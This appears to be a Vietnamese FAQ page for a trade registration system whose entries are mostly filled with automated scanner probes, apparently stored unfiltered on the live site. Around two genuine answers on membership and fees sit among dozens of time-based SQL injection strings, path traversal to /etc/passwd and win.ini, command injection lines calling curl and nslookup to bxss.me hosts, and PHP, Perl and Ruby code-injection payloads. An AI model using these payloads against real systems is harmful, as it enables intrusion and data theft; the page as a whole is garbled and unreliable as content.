Hỏi & đáp

1.
2. @@XOZyL
3. 1����%2527%2522
4. 1'"
5. '||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
6. *DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
7. KS5xFBNB')) OR 877=(SELECT 877 FROM PG_SLEEP(15))--
8. 65jPH8Mw') OR 359=(SELECT 359 FROM PG_SLEEP(15))--
9. XpuCXRPu' OR 536=(SELECT 536 FROM PG_SLEEP(15))--
10. -1)) OR 708=(SELECT 708 FROM PG_SLEEP(15))--
11. -5) OR 664=(SELECT 664 FROM PG_SLEEP(15))--
12. -5 OR 879=(SELECT 879 FROM PG_SLEEP(15))--
13. KYAnOrjt')); waitfor delay '0:0:15' --
14. htiQeKAP'); waitfor delay '0:0:15' --
15. r2NELNxI'; waitfor delay '0:0:15' --
16. 1 waitfor delay '0:0:15' --
17. -1)); waitfor delay '0:0:15' --
18. -1); waitfor delay '0:0:15' --
19. -1; waitfor delay '0:0:15' --
20. (select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
21. 0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z
22. 0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z
23. if(now()=sysdate(),sleep(15),0)
24. -1" OR 2+670-670-1=0+0+0+1 --
25. -1' OR 2+520-520-1=0+0+0+1 or 'nF7tOPEw'='
26. -1' OR 2+956-956-1=0+0+0+1 --
27. -1 OR 2+186-186-1=0+0+0+1
28. -1 OR 2+428-428-1=0+0+0+1 --
29.
30. LVX0OQdu
31.
32.
33.
34.
35.
36.
37.
@@L7EA9
38.
1����%2527%2522
39.
1'"
40.
'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
41.
*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
42.
yGtmANS2')) OR 75=(SELECT 75 FROM PG_SLEEP(15))--
43.
2rvggGFs') OR 823=(SELECT 823 FROM PG_SLEEP(15))--
44.
Uimd3y0w' OR 144=(SELECT 144 FROM PG_SLEEP(15))--
45.
-1)) OR 465=(SELECT 465 FROM PG_SLEEP(15))--
46.
-5) OR 898=(SELECT 898 FROM PG_SLEEP(15))--
47.
-5 OR 979=(SELECT 979 FROM PG_SLEEP(15))--
48.
2JPELfSP')); waitfor delay '0:0:15' --
49.
189k1Cwf'); waitfor delay '0:0:15' --
50.
lbbLQYar'; waitfor delay '0:0:15' --
51.
1 waitfor delay '0:0:15' --
52.
-1)); waitfor delay '0:0:15' --
53.
-1); waitfor delay '0:0:15' --
54.
-1; waitfor delay '0:0:15' --
55.
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
56.
0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z
57.
0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z
58.
if(now()=sysdate(),sleep(15),0)
59.
-1" OR 2+254-254-1=0+0+0+1 --
60.
-1' OR 2+215-215-1=0+0+0+1 or 'Zh1gez99'='
61.
-1' OR 2+557-557-1=0+0+0+1 --
62.
-1 OR 2+431-431-1=0+0+0+1
63.
-1 OR 2+511-511-1=0+0+0+1 --
64.
65.
INvFjLKL
66.
67.
68.
69.
70.
71.
72.
73.
74.
75.
76.
77.
78.
79.
80.
81.
82.
83.
84.
85.
86.
87.
88.
89.
90.
91.
92.
93.
94.
95. ../
96.
97. file:///etc/passwd
98. ../../../../../../../../../../../../../../windows/win.ini
99. ../../../../../../../../../../../../../../etc/passwd
100.
101. "||sleep(27*1000)*acuhtk||"
102. '||sleep(27*1000)*wpasqu||'
103. "&&sleep(27*1000)*narrjm&&"
104.
../
105.
106.
file:///etc/passwd
107. '&&sleep(27*1000)*tccvnw&&'
108.
../../../../../../../../../../../../../../windows/win.ini
109. '"()
110.
111.
112. ;(nslookup -q=cname hitnjopuouyefc6da0.bxss.me||curl hitnjopuouyefc6da0.bxss.me)|(nslookup -q=cname hitnjopuouyefc6da0.bxss.me||curl hitnjopuouyefc6da0.bxss.me)&(nslookup -q=cname hitnjopuouyefc6da0.bxss.me||curl hitnjopuouyefc6da0.bxss.me)
113. 12345'"\'\");|]*{ <>�''💡
114.
../../../../../../../../../../../../../../etc/passwd
115. `(nslookup -q=cname hithlmpphgkvc74271.bxss.me||curl hithlmpphgkvc74271.bxss.me)`
116.
117.
118. |(nslookup -q=cname hithyekqdiuos96eff.bxss.me||curl hithyekqdiuos96eff.bxss.me)
119.
120.
121. &(nslookup -q=cname hitxxkxdajptsba68c.bxss.me||curl hitxxkxdajptsba68c.bxss.me)&'\"`0&(nslookup -q=cname hitxxkxdajptsba68c.bxss.me||curl hitxxkxdajptsba68c.bxss.me)&`'
122.
123. &nslookup -q=cname hitvuwogiwwtad123e.bxss.me&'\"`0&nslookup -q=cname hitvuwogiwwtad123e.bxss.me&`'
124.
125.
126. $(nslookup -q=cname hittklvketwzu8d294.bxss.me||curl hittklvketwzu8d294.bxss.me)
127.
128.
129.
130.
131.
132.
12345'"\'\");|]*{ <>�''💡
133.
134. (nslookup -q=cname hituhdeqnumrxfa972.bxss.me||curl hituhdeqnumrxfa972.bxss.me))
135.
136.
137. |echo rqoihr$()\ fzzsya\nz^xyu||a #' |echo rqoihr$()\ fzzsya\nz^xyu||a #|" |echo rqoihr$()\ fzzsya\nz^xyu||a #
138.
139.
140. QA_Add/.
141.
Vx9VV1Wt
142.
143.
'&&sleep(27*1000)*coozsr&&'
144.
145.
146.
147. '"
148.
149.
'"()
150.
151.
152.
153.
'"
154.
155.
'.print(md5(31337)).'
156.
/\xfs.bxss.me?gov.vn
157. bxss.me
158.
//xfs.bxss.me?gov.vn
159. c:/windows/win.ini
160.
161.
xfs.bxss.me?gov.vn
162.
${@print(md5(31337))}\
163.
164.
165.
http://xfs.bxss.me?gov.vn
166. /etc/shells
167.
${@print(md5(31337))}
168.
169.
;(nslookup -q=cname hittmifcezdtt065f7.bxss.me||curl hittmifcezdtt065f7.bxss.me)|(nslookup -q=cname hittmifcezdtt065f7.bxss.me||curl hittmifcezdtt065f7.bxss.me)&(nslookup -q=cname hittmifcezdtt065f7.bxss.me||curl hittmifcezdtt065f7.bxss.me)
170. http://bxss.me/t/fit.txt?.jpg
171.
931254
172.
";print(md5(31337));$a="
173. Http://bxss.me/t/fit.txt
174.
xfs.bxss.me
175.
';print(md5(31337));$a='
176.
177. 1yrphmgdpgulaszriylqiipemefmacafkxycjaxjs.jpg
178.
`(nslookup -q=cname hitihrfrtezjo3ae63.bxss.me||curl hitihrfrtezjo3ae63.bxss.me)`
179.
;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));
180. http://dicrpdbjmemujemfyopp.zzz/yrphmgdpgulaszriylqiipemefmacafkxycjaxjs?.jpg
181.
182.
183.
184.
|(nslookup -q=cname hitvcgbsvmwkt99cf9.bxss.me||curl hitvcgbsvmwkt99cf9.bxss.me)
185. )))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))
186.
187.
&(nslookup -q=cname hitrgwzabaeuwa6e62.bxss.me||curl hitrgwzabaeuwa6e62.bxss.me)&'\"`0&(nslookup -q=cname hitrgwzabaeuwa6e62.bxss.me||curl hitrgwzabaeuwa6e62.bxss.me)&`'
188.
&nslookup -q=cname hittzdkksuozs3989e.bxss.me&'\"`0&nslookup -q=cname hittzdkksuozs3989e.bxss.me&`'
189.
)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))
190.
$(nslookup -q=cname hitansmzgzxos4cc2b.bxss.me||curl hitansmzgzxos4cc2b.bxss.me)
191.
192.
193.
194.
(nslookup -q=cname hitkldqnzwjrh48a7e.bxss.me||curl hitkldqnzwjrh48a7e.bxss.me))
195.
bxss.me
196. ^(#$!@#$)(()))******
197.
198.
199.
c:/windows/win.ini
200.
|echo rqdsgb$()\ niudoj\nz^xyu||a #' |echo rqdsgb$()\ niudoj\nz^xyu||a #|" |echo rqdsgb$()\ niudoj\nz^xyu||a #
201. !(()&&!|*|*|
202.
203.
204.
205. )
206.
207.
/etc/shells
208.
209.
210.
http://bxss.me/t/fit.txt?.jpg
211.
Http://bxss.me/t/fit.txt
212.
&echo esbrgk$()\ ucfayx\nz^xyu||a #' &echo esbrgk$()\ ucfayx\nz^xyu||a #|" &echo esbrgk$()\ ucfayx\nz^xyu||a #
213.
214.
1yrphmgdpgulaszriylqiipemefmacafkxycjaxjs.jpg
215.
216.
217.
echo bdgdzq$()\ frinaa\nz^xyu||a #' &echo bdgdzq$()\ frinaa\nz^xyu||a #|" &echo bdgdzq$()\ frinaa\nz^xyu||a #
218.
http://dicrpdbjmemujemfyopp.zzz/yrphmgdpgulaszriylqiipemefmacafkxycjaxjs?.jpg
219.
220. ${9999155+9999660}
221.
222.
^(#$!@#$)(()))******
223.
224.
${9999384+9999011}
225.
!(()&&!|*|*|
226.
227.
228.
)
229.
230. ".gethostbyname(lc("hitkf"."ljiiarotca46a.bxss.me."))."A".chr(67).chr(hex("58")).chr(119).chr(75).chr(115).chr(69)."
231.
232. '.gethostbyname(lc('hitwr'.'unuivqhb8548b.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(122).chr(71).chr(112).chr(69).'
233.
234.
235.
236.
".gethostbyname(lc("hitkj"."ktpyakey3210a.bxss.me."))."A".chr(67).chr(hex("58")).chr(111).chr(68).chr(117).chr(72)."
237.
238.
239.
'.gethostbyname(lc('hitsv'.'gwtkedlg922a2.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(103).chr(83).chr(97).chr(89).'
240.
241.
242.
243.
244.
245. &n922308=v945027
246.
247.
248. "+response.write(9874035*9559443)+"
249.
250.
251. '+response.write(9874035*9559443)+'
252.
253.
254. '+'A'.concat(70-3).concat(22*4).concat(120).concat(77).concat(112).concat(73)+(require'socket' Socket.gethostbyname('hitau'+'fkgjwsqea23f1.bxss.me.')[3].to_s)+'
255. response.write(9874035*9559443)
256. "+"A".concat(70-3).concat(22*4).concat(109).concat(78).concat(112).concat(89)+(require"socket" Socket.gethostbyname("hitax"+"eudlwzrp3ded0.bxss.me.")[3].to_s)+"
257.
258.
259.
260.
&n973859=v936849
261.
262.
263.
264.
265.
"+response.write(9817211*9341812)+"
266.
267.
'+response.write(9817211*9341812)+'
268.
269.
response.write(9817211*9341812)
270.
271.
'+'A'.concat(70-3).concat(22*4).concat(109).concat(83).concat(113).concat(72)+(require'socket' Socket.gethostbyname('hitsm'+'xnszdjpaa7990.bxss.me.')[3].to_s)+'
272.
273. /../../../../../../../../../../windows/system32/BITSADMIN.exe
274.
"+"A".concat(70-3).concat(22*4).concat(122).concat(68).concat(113).concat(84)+(require"socket" Socket.gethostbyname("hitma"+"gdmkftyebeaf6.bxss.me.")[3].to_s)+"
275.
276. @@sfkVB
277. Ai có thể đăng ký tham gia Hệ thống này?

Bất cứ doanh nghiệp, tổ chức, cá nhân hay hợp tác xã nào cũng có thể đăng ký tham gia hệ thống.

Trong đó, Khi tham gia, các đơn vị, tổ chức cá nhân cần tuân thủ quy định quy tắc hiện hành.

278. Chi phí tham gia hệ thống là bao nhiêu?

Đối với các đơn vị, tổ chức cá nhân là doanh nghiệp, hợp tác xã, hộ kinh doanh, hộ gia đình, trang trại.... đạt tiêu chuẩn chất lượng, có đầy đủ hồ swo pháp lý, giấy chứng nhận sản xuất kinh doanh đảm bảo an toàn, hoặc ký cam kết và nằm trong danh sách quản lý của các cấp được hỗ trợ tham gia hệ thống miễn phí (gia đoạn 2021-2022).

Đối tượng người tiêu dùng, khách hàng đăng ký là thành viên của Hệ thống đăng ký hoàn toàn miễn phí khi tuân thủ các quy tắc, quy định khi tham gia mua bán trao đổi trên Hệ thống này.

279. f08ckNuX')) OR 181=(SELECT 181 FROM PG_SLEEP(15))--

trả lời câu hỏi 1